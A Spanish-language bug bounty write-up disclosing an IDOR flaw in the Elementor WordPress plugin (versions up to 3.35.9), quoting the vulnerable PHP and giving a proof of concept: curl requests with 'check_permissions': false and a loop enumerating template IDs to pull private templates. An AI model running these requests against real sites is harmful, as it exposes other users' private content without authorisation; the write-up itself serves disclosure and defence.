IDOR en Elementor: Leyendo Plantillas Privadas con el Rol Author

Hoy quiero compartir un hallazgo que encontré durante mi participación en el programa de Bug Bounty de Wordfence Intelligence. Por razones de confidencialidad y ética, todos los detalles sensibles como dominios reales han sido anonimizados, pero la lógica y la técnica de explotación son 100% reales.

Este reporte fue enviado bajo el ID #447055 y afecta al plugin Elementor en versiones iguales o menores a la 3.35.9, uno de los page builders más utilizados en WordPress a nivel mundial.

¿Qué es un IDOR?

Un Insecure Direct Object Reference (IDOR) es una vulnerabilidad que ocurre cuando una aplicación expone referencias directas a objetos internos — como IDs de base de datos, rutas de archivos, etc. — sin validar correctamente si el usuario tiene permisos para acceder a ese objeto.

En este caso, el plugin Elementor permitía a un usuario autenticado con el rol de Author (un rol estándar de WordPress asignado comúnmente a colaboradores de blogs) acceder al contenido completo de cualquier plantilla privada o borrador de Elementor que perteneciera a cualquier otro usuario, incluido el administrador del sitio.

Diagrama de flujo del ataque IDOR en el plugin Elementor ≤ 3.35.9

¿Dónde estaba el problema?

La vulnerabilidad se origina en el archivo includes/template-library/sources/local.php. El método privado should_check_permissions() lee la clave check_permissions directamente desde el array $args controlado por el usuario, sin ningún tipo de sanitización:

Código PHP vulnerable en local.php — la cadena de bypass que permite el IDOR

Cuando should_check_permissions() devuelve false, el método is_allowed_to_read_template() concede acceso incondicional sin realizar ninguna verificación de propiedad o visibilidad. La única verificación de capacidad existente (edit_posts) era suficiente para el rol Author por defecto, completando el escenario de explotación.

// includes/template-library/sources/local.php — líneas 2097–2109
private function should_check_permissions( array $args ): bool {
    $check_permissions = isset( $args['check_permissions'] ) && false === $args['check_permissions'];

    if ( $check_permissions ) {
        return false;  // bypass — omite TODOS los controles de propiedad y visibilidad
    }

    return true;
}

// líneas 2079–2095
public function is_allowed_to_read_template( array $args ): bool {
    if ( ! $this->should_check_permissions( $args ) ) {
        return true;  // acceso concedido sin más verificaciones
    }
    // ... verificaciones de propiedad que ahora nunca se alcanzan
}

Flujo del Ataque

El administrador crea una plantilla privada en la biblioteca de Elementor.
El atacante (con rol Author) obtiene su sesión y el nonce de AJAX de Elementor.
El atacante envía una petición AJAX a admin-ajax.php con el parámetro "check_permissions": false.
El sistema omite todas las verificaciones de permisos y devuelve el contenido completo de la plantilla privada en formato JSON.
Iterando sobre IDs secuenciales, el atacante puede enumerar y exfiltrar toda la biblioteca de plantillas, independientemente del estado de publicación o del propietario.

Prueba de Concepto (PoC)

Comparación: petición normal (acceso denegado) vs petición con check_permissions:false (IDOR exitoso)

Paso 1 — Sin bypass: acceso denegado

Una petición normal sin el parámetro malicioso devuelve el error esperado de permisos:

curl -s -b /tmp/author.txt \
  --data-urlencode "_nonce=$NONCE" \
  --data-urlencode "action=elementor_ajax" \
  --data-urlencode 'actions={"1":{"action":"get_template_data","data":{"source":"local","template_id":130}}}' \
  "https://[TARGET]/wp-admin/admin-ajax.php"

# Respuesta esperada:
# {"success":false,"data":{"responses":{"1":{"success":false,"data":"You do not have permission to access this template."}}}}

Paso 2 — Con check_permissions:false: bypass exitoso

Al agregar el parámetro "check_permissions": false a la petición, el sistema omite todas las verificaciones y devuelve el contenido completo de la plantilla privada:

curl -s -b /tmp/author.txt \
  --data-urlencode "_nonce=$NONCE" \
  --data-urlencode "action=elementor_ajax" \
  --data-urlencode 'actions={"1":{"action":"get_template_data","data":{"source":"local","template_id":130,"check_permissions":false}}}' \
  "https://[TARGET]/wp-admin/admin-ajax.php"

# Respuesta: contenido completo de la plantilla privada devuelto en JSON

Paso 3 — Enumeración masiva de plantillas

for ID in $(seq 1 500); do
  curl -s -b /tmp/author.txt \
    --data-urlencode "_nonce=$NONCE" \
    --data-urlencode "action=elementor_ajax" \
    --data-urlencode "actions={\"1\":{\"action\":\"get_template_data\",\"data\":{\"source\":\"local\",\"template_id\":$ID,\"check_permissions\":false}}}" \
    "https://[TARGET]/wp-admin/admin-ajax.php"
done

Impacto

La severidad de esta vulnerabilidad es Media. Un atacante autenticado con el rol de Author puede leer el contenido completo de cualquier plantilla privada o borrador de Elementor de cualquier usuario, exfiltrar datos sensibles almacenados en las plantillas, y enumerar toda la biblioteca del sitio mediante iteración de IDs secuenciales.

Conclusión

Esta vulnerabilidad es un claro ejemplo de cómo un parámetro de control de acceso interno fue expuesto accidentalmente a la entrada del usuario sin ninguna sanitización. La confianza implícita en un valor booleano suministrado por el cliente para desactivar controles de seguridad es un antipatrón de diseño peligroso.

El reporte fue enviado a través del programa de Wordfence Intelligence y el equipo de Elementor fue notificado para su corrección.

Reporte #447055 — Wordfence Intelligence Vulnerability Submission | Programa público de Bug Bounty